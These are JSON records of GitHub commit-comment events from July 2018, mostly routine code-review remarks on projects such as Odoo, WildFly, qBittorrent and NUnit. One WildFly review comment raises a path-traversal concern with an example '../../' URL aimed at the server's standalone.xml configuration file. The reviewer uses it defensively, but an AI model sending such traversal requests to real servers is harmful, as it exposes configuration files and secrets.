{"id":"7943508567","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655774,"position":39,"line":1722,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:38:37Z","updated_at":"2018-07-10T12:38:37Z","author_association":"MEMBER","body":"typo: fields → field\r\n\"a bar chart or a line chart\" is just noise, simply say \"some chart\""}},"created_at":"2018-07-10T12:38:37Z"}
{"id":"7943510173","type":"CommitCommentEvent","actor":{"login":"ArtoLabs"},"repo":{"name":"ArtoLabs/SteemAX"},"payload":{"comment":{"id":29655777,"position":null,"line":null,"path":null,"commit_id":"d93717b714cd866c16138a40eeff1ba361cf91f1","created_at":"2018-07-10T12:38:54Z","updated_at":"2018-07-10T12:38:54Z","author_association":"OWNER","body":"After receiving the HTML created by @outwork for task @learnelectronics/steemax-needs-a-new-web-page-design I integrated the javascript functionality. I also renamed some classes and adjusted the code to be more friendly to mozilla. I replaced placeholder and tooltip text."}},"created_at":"2018-07-10T12:38:54Z"}
{"id":"7943510665","type":"CommitCommentEvent","actor":{"login":"dev-sl"},"repo":{"name":"eightalex/yousleep"},"payload":{"comment":{"id":29655780,"position":4,"line":24,"path":"Nginx-1.12_vhost.conf","commit_id":"efea81c4219a4cb57bcc1f5bf722a3d386a26290","created_at":"2018-07-10T12:39:00Z","updated_at":"2018-07-10T12:39:00Z","author_association":"CONTRIBUTOR","body":"%hostdir%/.env"}},"created_at":"2018-07-10T12:39:00Z"}
{"id":"7943514900","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655794,"position":64,"line":1747,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:39:46Z","updated_at":"2018-07-10T12:39:46Z","author_association":"MEMBER","body":"parameter is `groupby`"}},"created_at":"2018-07-10T12:39:46Z"}
{"id":"7943516175","type":"CommitCommentEvent","actor":{"login":"sagawaharuhide"},"repo":{"name":"sagawaharuhide/git-app"},"payload":{"comment":{"id":29655801,"position":null,"line":null,"path":null,"commit_id":"315df9b8b56968019fa27f3342a5a77e1427b2fa","created_at":"2018-07-10T12:40:01Z","updated_at":"2018-07-10T12:40:01Z","author_association":"OWNER","body":"不要なファイル・コメントアウトがあればコミットする以前に削除してしまいましょう。"}},"created_at":"2018-07-10T12:40:01Z"}
{"id":"7943517101","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29655807,"position":null,"line":null,"path":null,"commit_id":"bcf9dd08342942cc07f4eae86323ea603a1640f9","created_at":"2018-07-10T12:40:12Z","updated_at":"2018-07-10T12:40:12Z","author_association":"NONE","body":"Puzzle `223-5ca94c9b` disappeared from [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java), that's why I closed #228. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-10T12:40:12Z"}
{"id":"7943517524","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"llorllale/youtrack-api"},"payload":{"comment":{"id":29655808,"position":null,"line":null,"path":null,"commit_id":"bcf9dd08342942cc07f4eae86323ea603a1640f9","created_at":"2018-07-10T12:40:15Z","updated_at":"2018-07-10T12:40:15Z","author_association":"NONE","body":"Puzzle `228-5ca94c9b` discovered in   [`src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java`](  https://github.com/llorllale/youtrack-api/blob/master/src/main/java/org/llorllale/youtrack/api/DefaultYouTrack.java)   and submitted as #231. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-10T12:40:15Z"}
{"id":"7943518274","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655810,"position":67,"line":1750,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:40:23Z","updated_at":"2018-07-10T12:40:23Z","author_association":"MEMBER","body":"returned is a list like data with extra elements"}},"created_at":"2018-07-10T12:40:23Z"}
{"id":"7943518494","type":"CommitCommentEvent","actor":{"login":"mchoma"},"repo":{"name":"fjuma/wildfly"},"payload":{"comment":{"id":29655813,"position":54,"line":391,"path":"undertow/src/main/java/org/wildfly/extension/undertow/Host.java","commit_id":"8b27aeb1eec9168b8dfdad845c51458b468858ac","created_at":"2018-07-10T12:40:26Z","updated_at":"2018-07-10T12:40:26Z","author_association":"NONE","body":"So do I understand correctly file exists in ${jboss.home.dir}/.well-known/acme-challenge. And this is how Undertow provide that file.\r\n\r\nIsn't that vulnerable to traversal path attack. I mean what happen if I request http://localhost:8080/.well-known/acme-challenge/../../standalone/configuration/standalone.xml"}},"created_at":"2018-07-10T12:40:26Z"}
{"id":"7943519299","type":"CommitCommentEvent","actor":{"login":"facetoe"},"repo":{"name":"jorijinnall/zenpy"},"payload":{"comment":{"id":29655814,"position":4,"line":391,"path":"zenpy/lib/endpoint.py","commit_id":"54868e319641ae305bde09e9568c2a6bc605faf7","created_at":"2018-07-10T12:40:35Z","updated_at":"2018-07-10T12:40:35Z","author_association":"CONTRIBUTOR","body":"I don't think you need the trailing `/{}`. "}},"created_at":"2018-07-10T12:40:35Z"}
{"id":"7943523146","type":"CommitCommentEvent","actor":{"login":"parkyounghwan"},"repo":{"name":"parkyounghwan/Algorithm"},"payload":{"comment":{"id":29655825,"position":null,"line":null,"path":null,"commit_id":"3e5b1385bdde1624f66822997ff57b37623998c5","created_at":"2018-07-10T12:41:17Z","updated_at":"2018-07-10T12:41:17Z","author_association":"OWNER","body":"오게이\n\n2018-07-09 22:36 GMT+09:00 Min Kuk Jo <notifications@github.com>:\n\n> 아조씨 설탕은 Suger가 아니고 Sugar 에오\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/parkyounghwan/Algorithm/commit/3e5b1385bdde1624f66822997ff57b37623998c5#commitcomment-29641895>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATqyYiDsWXx3EWwZPJOY7incNpIp_o2lks5uE1xbgaJpZM4VHuCB>\n> .\n>\n"}},"created_at":"2018-07-10T12:41:17Z"}
{"id":"7943534301","type":"CommitCommentEvent","actor":{"login":"amarp-synerzip"},"repo":{"name":"priyankap-synerzip/MealsPlusAutomation"},"payload":{"comment":{"id":29655849,"position":34,"line":34,"path":"src/main/java/K12PaymentCenter/pages/AddStudentPage.java","commit_id":"c46b48e12c07ef28294866a48b7e3008dda6b2c4","created_at":"2018-07-10T12:43:21Z","updated_at":"2018-07-10T12:43:21Z","author_association":"COLLABORATOR","body":"wait.until(ExpectedConditions.visibilityOf(\r\ngetSaveButton = DriverHelper.getMobileElement\r\n\r\nits upside down. first you wait until elements are loaded and then you locate them, reason if you could locate elements at first place itself, you won't need to use wait until."}},"created_at":"2018-07-10T12:43:21Z"}
{"id":"7943536695","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655856,"position":97,"line":1780,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:43:47Z","updated_at":"2018-07-10T12:43:47Z","author_association":"MEMBER","body":"We have seen that this may be incorrect when datetimes are returned from PG with different timezones."}},"created_at":"2018-07-10T12:43:47Z"}
{"id":"7943539982","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-tbc"},"payload":{"comment":{"id":29655867,"position":null,"line":null,"path":null,"commit_id":"1fdbbea4c7f18a1bbb9fd9fab65dc7339f167722","created_at":"2018-07-10T12:44:22Z","updated_at":"2018-07-10T12:44:22Z","author_association":"CONTRIBUTOR","body":"I did that in TBC and I did that in vanilla from the getgo. Nice suggestion."}},"created_at":"2018-07-10T12:44:22Z"}
{"id":"7943541881","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655869,"position":108,"line":1791,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:44:41Z","updated_at":"2018-07-10T12:44:41Z","author_association":"MEMBER","body":"please check Python's guidelines about line spacing"}},"created_at":"2018-07-10T12:44:41Z"}
{"id":"7943543141","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655871,"position":114,"line":1796,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:44:54Z","updated_at":"2018-07-10T12:44:54Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:44:54Z"}
{"id":"7943543298","type":"CommitCommentEvent","actor":{"login":"davidhalter"},"repo":{"name":"davidhalter/parso"},"payload":{"comment":{"id":29655872,"position":null,"line":null,"path":null,"commit_id":"e6bc924fbabbfa3090044e475c91a7655b9c6e9b","created_at":"2018-07-10T12:44:55Z","updated_at":"2018-07-10T12:44:55Z","author_association":"OWNER","body":"Sorry, forgot to push."}},"created_at":"2018-07-10T12:44:55Z"}
{"id":"7943544819","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655876,"position":123,"line":1881,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:45:10Z","updated_at":"2018-07-10T12:45:10Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:45:10Z"}
{"id":"7943545358","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655879,"position":131,"line":1888,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:45:15Z","updated_at":"2018-07-10T12:45:15Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:45:15Z"}
{"id":"7943545833","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655882,"position":134,"line":1890,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:45:20Z","updated_at":"2018-07-10T12:45:20Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:45:20Z"}
{"id":"7943546236","type":"CommitCommentEvent","actor":{"login":"Noxxxious"},"repo":{"name":"franciscofranco/enchilada"},"payload":{"comment":{"id":29655883,"position":30,"line":706,"path":"arch/arm64/configs/franco-oos_defconfig","commit_id":"fc3bed187f0ab4b026f53b52e89650bce22f1bca","created_at":"2018-07-10T12:45:24Z","updated_at":"2018-07-10T12:45:24Z","author_association":"NONE","body":"No crap placebo patches, or \"magical\" optimizations @tbalden "}},"created_at":"2018-07-10T12:45:24Z"}
{"id":"7943546373","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655884,"position":149,"line":1917,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:45:26Z","updated_at":"2018-07-10T12:45:26Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:45:26Z"}
{"id":"7943547047","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655887,"position":165,"line":1963,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:45:33Z","updated_at":"2018-07-10T12:45:33Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:45:33Z"}
{"id":"7943547402","type":"CommitCommentEvent","actor":{"login":"kwin"},"repo":{"name":"Buuhuu/accesscontroltool"},"payload":{"comment":{"id":29655889,"position":5,"line":73,"path":"accesscontroltool-bundle/src/main/java/biz/netcentric/cq/tools/actool/authorizableinstaller/impl/AuthorizableInstallerServiceImpl.java","commit_id":"b0c1c6e30a7681ef06610cf71932dd399d52f394","created_at":"2018-07-10T12:45:37Z","updated_at":"2018-07-10T12:45:37Z","author_association":"NONE","body":"For regular deployments this may cause regressions, as the service is not restarted once the service becomes available. You should at least make this a greedy reference!"}},"created_at":"2018-07-10T12:45:37Z"}
{"id":"7943547774","type":"CommitCommentEvent","actor":{"login":"brunohcfaria"},"repo":{"name":"INDTSON/SHARC"},"payload":{"comment":{"id":29655893,"position":37,"line":204,"path":"sharc/simulation_imt_vale.py","commit_id":"b6bcb8c3f6ee9defe7afebfbf2c7963b217a0a8d","created_at":"2018-07-10T12:45:41Z","updated_at":"2018-07-10T12:45:41Z","author_association":"NONE","body":"Please, remove unnecessary comments."}},"created_at":"2018-07-10T12:45:41Z"}
{"id":"7943548074","type":"CommitCommentEvent","actor":{"login":"brunohcfaria"},"repo":{"name":"INDTSON/SHARC"},"payload":{"comment":{"id":29655894,"position":15,"line":38,"path":"sharc/simulation_imt_vale_downlink.py","commit_id":"b6bcb8c3f6ee9defe7afebfbf2c7963b217a0a8d","created_at":"2018-07-10T12:45:45Z","updated_at":"2018-07-10T12:45:45Z","author_association":"NONE","body":"Hardcode `np.power(0.1, 50)`"}},"created_at":"2018-07-10T12:45:45Z"}
{"id":"7943548222","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29655895,"position":174,"line":1978,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:45:46Z","updated_at":"2018-07-10T12:45:46Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:45:46Z"}
{"id":"7943548413","type":"CommitCommentEvent","actor":{"login":"brunohcfaria"},"repo":{"name":"INDTSON/SHARC"},"payload":{"comment":{"id":29655896,"position":115,"line":289,"path":"sharc/simulation_imt_vale_downlink.py","commit_id":"b6bcb8c3f6ee9defe7afebfbf2c7963b217a0a8d","created_at":"2018-07-10T12:45:49Z","updated_at":"2018-07-10T12:45:49Z","author_association":"NONE","body":"can we use `np.clip` for performance?"}},"created_at":"2018-07-10T12:45:49Z"}
{"id":"7943554945","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/matyoo111"},"payload":{"comment":{"id":29655919,"position":56,"line":56,"path":"week-08/reddit/src/main/java/com/greenfoxacademy/reddit/models/Post.java","commit_id":"aaa0a9d05cf4db2761d5ccba8ac99956341c21b2","created_at":"2018-07-10T12:46:59Z","updated_at":"2018-07-10T12:46:59Z","author_association":"NONE","body":"Almost perfect model 🥇 , but unfortunately this method makes all wrong... The name says it add something to something, but what it does is to decrease something by one. I would name this method `decreasePopularity()` or something like this, and I would create an `increasePopularity()` too. And I can imagine that, the users has different weight and their votes have different values...so I would move the increase/decrease methods to the service class to calculate the new value."}},"created_at":"2018-07-10T12:46:59Z"}
{"id":"7943555972","type":"CommitCommentEvent","actor":{"login":"Chocobo1"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29655922,"position":22,"line":539,"path":"src/base/bittorrent/session.cpp","commit_id":"d61435e4bf15e41d780f57179b182ba999084a62","created_at":"2018-07-10T12:47:10Z","updated_at":"2018-07-10T12:47:10Z","author_association":"MEMBER","body":"`saveInterval == 0` can be true."}},"created_at":"2018-07-10T12:47:10Z"}
{"id":"7943557372","type":"CommitCommentEvent","actor":{"login":"Hauffo"},"repo":{"name":"mattpitkin/yamm"},"payload":{"comment":{"id":29655927,"position":null,"line":null,"path":null,"commit_id":"24302de4a9b01be92d17e73ad19ebea6ec62e1f7","created_at":"2018-07-10T12:47:24Z","updated_at":"2018-07-10T12:47:24Z","author_association":"NONE","body":"Thank you so much for your file. I have a question about the algorithm. \r\nCould I ask that the prior distribution can be multivariate normal? Say for example, could the variable amp be a  vector? and could the variable phi0 be a matrix? "}},"created_at":"2018-07-10T12:47:24Z"}
{"id":"7943559831","type":"CommitCommentEvent","actor":{"login":"zeule"},"repo":{"name":"qbittorrent/qBittorrent"},"payload":{"comment":{"id":29655931,"position":22,"line":539,"path":"src/base/bittorrent/session.cpp","commit_id":"d61435e4bf15e41d780f57179b182ba999084a62","created_at":"2018-07-10T12:47:52Z","updated_at":"2018-07-10T12:47:52Z","author_association":"CONTRIBUTOR","body":"Oops, pardon me."}},"created_at":"2018-07-10T12:47:52Z"}
{"id":"7943562708","type":"CommitCommentEvent","actor":{"login":"lekemula"},"repo":{"name":"stympy/faker"},"payload":{"comment":{"id":29655943,"position":86,"line":94,"path":"lib/locales/en/rupaul.yml","commit_id":"1a10cce173650a15117021f5b29530dcc2731eed","created_at":"2018-07-10T12:48:22Z","updated_at":"2018-07-10T12:48:22Z","author_association":"NONE","body":"`I18n::InvalidLocaleData` is raised because of extra coma in the last line"}},"created_at":"2018-07-10T12:48:22Z"}
{"id":"7943565600","type":"CommitCommentEvent","actor":{"login":"ghenzler"},"repo":{"name":"Buuhuu/accesscontroltool"},"payload":{"comment":{"id":29655954,"position":5,"line":73,"path":"accesscontroltool-bundle/src/main/java/biz/netcentric/cq/tools/actool/authorizableinstaller/impl/AuthorizableInstallerServiceImpl.java","commit_id":"b0c1c6e30a7681ef06610cf71932dd399d52f394","created_at":"2018-07-10T12:48:52Z","updated_at":"2018-07-10T12:48:52Z","author_association":"NONE","body":"@Buuhuu Here we should probably use [ReferencePolicyOption.GREEDY](https://osgi.org/javadoc/r5/enterprise/org/osgi/service/component/annotations/ReferencePolicyOption.html#GREEDY) along with OPTIONAL_UNARY as it might become available later (other than for ExternalGroupInstallerServiceImpl that will only be available if oak as started at startlevel 15 provides this feature)"}},"created_at":"2018-07-10T12:48:52Z"}
{"id":"7943565882","type":"CommitCommentEvent","actor":{"login":"Freegos"},"repo":{"name":"A-BN/QuasiKlon"},"payload":{"comment":{"id":29655955,"position":null,"line":null,"path":null,"commit_id":"3a5c9af867b832073390f84476d6c79db3fa0295","created_at":"2018-07-10T12:48:55Z","updated_at":"2018-07-10T12:48:55Z","author_association":"COLLABORATOR","body":"The complete error \r\n Error in mutate_impl(.data, dots) : \r\n  Evaluation error: must be type integer, not character."}},"created_at":"2018-07-10T12:48:55Z"}
{"id":"7943571792","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/matyoo111"},"payload":{"comment":{"id":29655971,"position":12,"line":12,"path":"week-08/reddit/src/main/java/com/greenfoxacademy/reddit/repositories/RedditRepository.java","commit_id":"aaa0a9d05cf4db2761d5ccba8ac99956341c21b2","created_at":"2018-07-10T12:49:58Z","updated_at":"2018-07-10T12:49:58Z","author_association":"NONE","body":"This is going to solve your problem 👍 but I recommend to you to check the \"original\" return type(optional). It has got many useful methods, just type a \".\" after `findAll()`"}},"created_at":"2018-07-10T12:49:58Z"}
{"id":"7943572850","type":"CommitCommentEvent","actor":{"login":"ghenzler"},"repo":{"name":"Buuhuu/accesscontroltool"},"payload":{"comment":{"id":29655976,"position":5,"line":73,"path":"accesscontroltool-bundle/src/main/java/biz/netcentric/cq/tools/actool/authorizableinstaller/impl/AuthorizableInstallerServiceImpl.java","commit_id":"b0c1c6e30a7681ef06610cf71932dd399d52f394","created_at":"2018-07-10T12:50:12Z","updated_at":"2018-07-10T12:50:12Z","author_association":"NONE","body":"@kwin only saw your comment now"}},"created_at":"2018-07-10T12:50:12Z"}
{"id":"7943575589","type":"CommitCommentEvent","actor":{"login":"doitian"},"repo":{"name":"NervosFoundation/rust-rocksdb"},"payload":{"comment":{"id":29655987,"position":10,"line":10,"path":"tests/test_pinnable_slice.rs","commit_id":"f4bdb623c1ff1eb7d7ec846986cb166090916c95","created_at":"2018-07-10T12:50:39Z","updated_at":"2018-07-10T12:50:39Z","author_association":"MEMBER","body":"Got it"}},"created_at":"2018-07-10T12:50:39Z"}
{"id":"7943576025","type":"CommitCommentEvent","actor":{"login":"mcepeda"},"repo":{"name":"cerminar/cmssw"},"payload":{"comment":{"id":29655989,"position":null,"line":null,"path":null,"commit_id":"7a9e16c035e66a43a32980031ef8165542164940","created_at":"2018-07-10T12:50:44Z","updated_at":"2018-07-10T12:50:44Z","author_association":"NONE","body":"Hi GianLuca,\r\n\r\nI removed for now the quality criteria in https://github.com/cms-l1t-offline/cmssw/pull/692/files#diff-e844bd1eaad4eb9b7cdf9b7ae3d18826R41 (without the changes to the Identification criteria the ID criteria was logically not letting events through)\r\n\r\n@rekovic, are these changes expected to be added to the common recipe soon? (if so I can wait, if not I will merge them by hand in my area)\r\n\r\nBest,\r\n\r\nMaria \r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-10T12:50:44Z"}
{"id":"7943576670","type":"CommitCommentEvent","actor":{"login":"jhabdas"},"repo":{"name":"MattMattV/after-dark"},"payload":{"comment":{"id":29655991,"position":null,"line":null,"path":null,"commit_id":"19fa17bdb044830f31bfb7e0be2a025a37899d26","created_at":"2018-07-10T12:50:50Z","updated_at":"2018-07-10T12:50:50Z","author_association":"NONE","body":"How is it so far?"}},"created_at":"2018-07-10T12:50:50Z"}
{"id":"7943579526","type":"CommitCommentEvent","actor":{"login":"nath-thoms"},"repo":{"name":"nath-thoms/kingu-bot"},"payload":{"comment":{"id":29655994,"position":null,"line":null,"path":null,"commit_id":"f182bbcd097589e0f9ebcdaa69e326280ef98be1","created_at":"2018-07-10T12:51:22Z","updated_at":"2018-07-10T12:51:22Z","author_association":"OWNER","body":"I am very happy with this contribution "}},"created_at":"2018-07-10T12:51:22Z"}
{"id":"7943585121","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29656005,"position":null,"line":null,"path":null,"commit_id":"151f0442c385a37c31421a60179256b27f8f2004","created_at":"2018-07-10T12:52:21Z","updated_at":"2018-07-10T12:52:21Z","author_association":"MEMBER","body":"No file name update? "}},"created_at":"2018-07-10T12:52:21Z"}
{"id":"7943589590","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29656012,"position":8,"line":8,"path":"compiler/testData/codegen/box/inlineClasses/castInsideWhenExpression.kt","commit_id":"93bb49df6ec6f46d7d86b344aadf4b84ceb2ec9a","created_at":"2018-07-10T12:53:10Z","updated_at":"2018-07-10T12:53:10Z","author_association":"MEMBER","body":"why is this when needed for?"}},"created_at":"2018-07-10T12:53:10Z"}
{"id":"7943591375","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29656014,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T12:53:28Z","updated_at":"2018-07-10T12:53:28Z","author_association":"CONTRIBUTOR","body":"@oznetmaster But if you execute `AfterTest` in a `finally` block like that, how will you be able to abort an infinite loop in `AfterTest`?"}},"created_at":"2018-07-10T12:53:28Z"}
{"id":"7943593346","type":"CommitCommentEvent","actor":{"login":"cocadume"},"repo":{"name":"cocadume/TIL-1D1C"},"payload":{"comment":{"id":29656022,"position":null,"line":null,"path":null,"commit_id":"99ab3472089e086e3c29e6f61e8aa818596dab67","created_at":"2018-07-10T12:53:50Z","updated_at":"2018-07-10T12:53:50Z","author_association":"OWNER","body":"샤드 & 리플리카 한 번 더 읽으면 좋을거 같다"}},"created_at":"2018-07-10T12:53:50Z"}
{"id":"7943599192","type":"CommitCommentEvent","actor":{"login":"jnm2"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":29656033,"position":null,"line":null,"path":null,"commit_id":"2e19b4e99144ce1c9437b4e9a03987987b9aaf64","created_at":"2018-07-10T12:54:50Z","updated_at":"2018-07-10T12:54:50Z","author_association":"CONTRIBUTOR","body":"@oznetmaster Also, we thought we never abort threads unless we expect to be able to reset and continue using them. Wouldn't it be better for CF not to define THREAD_ABORT?"}},"created_at":"2018-07-10T12:54:50Z"}
{"id":"7943604728","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29656046,"position":8,"line":8,"path":"compiler/testData/codegen/box/inlineClasses/castInsideWhenExpression.kt","commit_id":"93bb49df6ec6f46d7d86b344aadf4b84ceb2ec9a","created_at":"2018-07-10T12:55:51Z","updated_at":"2018-07-10T12:55:51Z","author_association":"MEMBER","body":"I'd rewrite this when with more \"real-world\" example, because such cases can be potentially optimized on different phases"}},"created_at":"2018-07-10T12:55:51Z"}
{"id":"7943604875","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656047,"position":199,"line":2027,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:55:53Z","updated_at":"2018-07-10T12:55:53Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:55:53Z"}
{"id":"7943605155","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656048,"position":207,"line":2038,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:55:56Z","updated_at":"2018-07-10T12:55:56Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:55:56Z"}
{"id":"7943605432","type":"CommitCommentEvent","actor":{"login":"dhessler"},"repo":{"name":"Nordstrom/serverless-artillery"},"payload":{"comment":{"id":29656049,"position":2,"line":1,"path":"lib/serverless-fx.js","commit_id":"a81eeb2c7a2ecae87329ac661a5087c980c95ec0","created_at":"2018-07-10T12:55:59Z","updated_at":"2018-07-10T12:55:59Z","author_association":"NONE","body":"this is breaking global installs; should be `const { execSync } = require('child_process')`"}},"created_at":"2018-07-10T12:55:59Z"}
{"id":"7943605966","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656050,"position":220,"line":2134,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:56:06Z","updated_at":"2018-07-10T12:56:06Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:56:06Z"}
{"id":"7943605980","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/matyoo111"},"payload":{"comment":{"id":29656051,"position":40,"line":40,"path":"week-08/reddit/src/main/java/com/greenfoxacademy/reddit/controllers/RedditController.java","commit_id":"aaa0a9d05cf4db2761d5ccba8ac99956341c21b2","created_at":"2018-07-10T12:56:06Z","updated_at":"2018-07-10T12:56:06Z","author_association":"NONE","body":"Yes, exactly that's what we want to do 👍 , but how do you feel when you watch this line?\r\nI would create a service class and replace this 2 lines with `postService.increasePopularity(id);`"}},"created_at":"2018-07-10T12:56:06Z"}
{"id":"7943606734","type":"CommitCommentEvent","actor":{"login":"Buuhuu"},"repo":{"name":"Buuhuu/accesscontroltool"},"payload":{"comment":{"id":29656054,"position":5,"line":73,"path":"accesscontroltool-bundle/src/main/java/biz/netcentric/cq/tools/actool/authorizableinstaller/impl/AuthorizableInstallerServiceImpl.java","commit_id":"b0c1c6e30a7681ef06610cf71932dd399d52f394","created_at":"2018-07-10T12:56:13Z","updated_at":"2018-07-10T12:56:13Z","author_association":"OWNER","body":"applied in a213de4"}},"created_at":"2018-07-10T12:56:13Z"}
{"id":"7943608518","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656058,"position":244,"line":2157,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:56:31Z","updated_at":"2018-07-10T12:56:31Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:56:31Z"}
{"id":"7943608749","type":"CommitCommentEvent","actor":{"login":"rco-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29656061,"position":249,"line":2162,"path":"odoo/models.py","commit_id":"29c53c3e1780249fb03f0bc58da0d76acf2ef865","created_at":"2018-07-10T12:56:34Z","updated_at":"2018-07-10T12:56:34Z","author_association":"MEMBER","body":"remove from diff"}},"created_at":"2018-07-10T12:56:34Z"}
{"id":"7943608858","type":"CommitCommentEvent","actor":{"login":"danielneto81"},"repo":{"name":"danielneto81/Tool-System"},"payload":{"comment":{"id":29656062,"position":1,"line":1,"path":"master","commit_id":"45c74c799c21490850571aac4b41a6b1a3573c77","created_at":"2018-07-10T12:56:35Z","updated_at":"2018-07-10T12:56:35Z","author_association":"OWNER","body":"![logo-maogrande](https://user-images.githubusercontent.com/40388125/42511173-a7dd353c-8440-11e8-81a9-b796e9e58bf5.png)\r\n"}},"created_at":"2018-07-10T12:56:35Z"}
